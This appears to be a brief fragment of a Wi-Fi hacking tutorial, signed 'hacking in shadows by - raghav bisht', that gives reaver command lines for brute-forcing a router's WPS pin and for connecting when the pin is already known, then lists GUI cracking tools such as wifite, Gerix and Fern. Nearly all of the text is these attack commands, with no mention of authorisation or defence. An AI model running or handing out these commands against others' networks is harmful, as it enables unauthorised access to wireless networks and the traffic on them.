[ to se if WPS key is enable or not ( it should be enable) ] means [" wps locked option -- no "]

reaver -i mon0 -b <BSSID> -S --no-nacks -d7 -vv -c 1

NOTE : If u already have pin :

reaver -i mon0(or airoscript if you use fakeMAC) -b (bssid) -vv -c (channel) -e (name of AP) -p

(wps pin)

Graphical Interface Tools For Wi-Fi Hacking

wifite

Gerix Wi-Fi Cracker

Fern Wi-Fi Cracker

hacking in shadows by - raghav bisht

Internet